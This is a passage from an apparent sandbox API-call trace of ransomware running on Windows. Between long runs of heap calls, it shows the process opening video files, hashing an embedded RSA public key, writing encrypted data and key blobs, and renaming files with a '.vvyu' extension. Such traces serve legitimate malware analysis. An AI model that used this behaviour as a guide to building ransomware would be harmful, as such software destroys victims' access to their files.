hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeade8 | out: hHeap=0x2c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.788] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x6fae, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x6fae, lpOverlapped=0x0) returned 1 [0198.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.789] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6fb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.789] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.790] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.791] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.791] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.791] CloseHandle (hObject=0x584) returned 1 [0198.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0198.793] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\P2QT4FKo.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\p2qt4fko.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\P2QT4FKo.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\p2qt4fko.mp4.vvyu")) returned 1 [0198.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.794] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0198.797] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfb2390, ftCreationTime.dwHighDateTime=0x1d8a707, ftLastAccessTime.dwLowDateTime=0xb9918dc0, ftLastAccessTime.dwHighDateTime=0x1d8a717, ftLastWriteTime.dwLowDateTime=0xb9918dc0, ftLastWriteTime.dwHighDateTime=0x1d8a717, nFileSizeHigh=0x0, nFileSizeLow=0x16fd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wx0aR91G76sZ.flv", cAlternateFileName="WX0AR9~1.FLV")) returned 1 [0198.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0198.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.798] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\wx0aR91G76sZ.flv") returned=".flv" [0198.798] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\wx0aR91G76sZ.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\wx0ar91g76sz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.798] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=94162) returned 1 [0198.799] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.804] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16fac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.805] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.807] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.807] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x16fd2, lpOverlapped=0x0) returned 1 [0198.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.808] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0198.809] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.809] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.809] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.809] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.809] GetLastError () returned 0x0 [0198.810] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.810] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0198.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.810] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.810] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.810] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16fd0) returned 0x2af7168 [0198.811] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeade8 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeae30 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0198.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0198.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.812] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69e0 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae69c8 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.814] GetCurrentThreadId () returned 0x5d8 [0198.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af57b0 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.815] GetCurrentThreadId () returned 0x5d8 [0198.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0198.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0198.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69e0 [0198.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a40 [0198.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a58 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69f8 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 